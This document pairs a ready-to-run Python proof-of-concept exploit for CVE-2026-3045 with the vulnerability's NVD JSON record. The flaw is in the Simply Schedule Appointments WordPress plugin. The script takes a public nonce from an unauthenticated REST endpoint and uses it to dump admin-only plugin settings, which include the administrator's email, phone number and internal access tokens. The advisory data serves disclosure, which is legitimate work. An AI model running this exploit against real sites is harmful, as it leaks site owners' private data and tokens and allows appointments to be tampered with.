CVE-2026-3045

import requests # CVE-2026-3045 PoC - Unauthorized access to WordPress plugin settings # Target: Simply Schedule Appointments plugin <= 1.6.9.29 TARGET_URL = "http://target-wordpress-site.com" def exploit_cve_2026_3045(): # Step 1: Get public_nonce from the exposed endpoint embed_url = f"{TARGET_URL}/wp-json/ssa/v1/embed-inner" try: response = requests.get(embed_url, timeout=10) if response.status_code == 200: data = response.json() public_nonce = data.get('public_nonce') print(f"[+] Obtained public_nonce: {public_nonce}") # Step 2: Access admin settings using the public nonce settings_url = f"{TARGET_URL}/wp-json/ssa/v1/settings/admin" headers = { 'X-WP-Nonce': public_nonce } settings_response = requests.get(settings_url, headers=headers, timeout=10) if settings_response.status_code == 200: settings = settings_response.json() print(f"[+] Successfully accessed admin settings!") print(f"[+] Settings data: {settings}") return settings except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": exploit_cve_2026_3045()

{"cve": {"id": "CVE-2026-3045", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:10.307", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking Calendar — Simply Schedule Appointments plugin for WordPress is vulnerable to unauthorized access of sensitive data in all versions up to and including 1.6.9.29. This is due to two compounding weaknesses: (1) a non-user-bound `public_nonce` is exposed to unauthenticated users through the public `/wp-json/ssa/v1/embed-inner` REST endpoint, and (2) the `get_item()` method in `SSA_Settings_Api` relies on `nonce_permissions_check()` for authorization (which accepts the public nonce) but does not call `remove_unauthorized_settings_for_current_user()` to filter restricted fields. This makes it possible for unauthenticated attackers to access admin-only plugin settings including the administrator email, phone number, internal access tokens, notification configurations, and developer settings via the `/wp-json/ssa/v1/settings/{section}` endpoint. The exposure of appointment tokens also allows an attacker to modify or cancel appointments."}, {"lang": "es", "value": "El plugin Appointment Booking Calendar — Simply Schedule Appointments para WordPress es vulnerable al acceso no autorizado de datos sensibles en todas las versiones hasta la 1.6.9.29 inclusive. Esto se debe a dos debilidades combinadas: (1) un `public_nonce` no vinculado al usuario se expone a usuarios no autenticados a través del endpoint REST público `/wp-json/ssa/v1/embed-inner`, y (2) el método `get_item()` en `SSA_Settings_Api` se basa en `nonce_permissions_check()` para la autorización (que acepta el nonce público) pero no llama a `remove_unauthorized_settings_for_current_user()` para filtrar campos restringidos. Esto hace posible que atacantes no autenticados accedan a configuraciones del plugin solo para administradores, incluyendo el correo electrónico del administrador, número de teléfono, tokens de acceso internos, configuraciones de notificación y configuraciones de desarrollador a través del endpoint `/wp-json/ssa/v1/settings/{section}`. La exposición de los tokens de citas también permite a un atacante modificar o cancelar citas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-bootstrap.php#L151", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/class-settings-api.php#L128", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.21/includes/lib/td-util/class-td-api-model.php#L361", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480506%40simply-schedule-appointments%2Ftrunk&old=3475885%40simply-schedule-appointments%2Ftrunk&sfp_email=&sfph_mail=#file0", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5970b8d6-0041-4c30-a6ce-fe67ebf415f5?source=cve", "source": "[email protected]"}]}}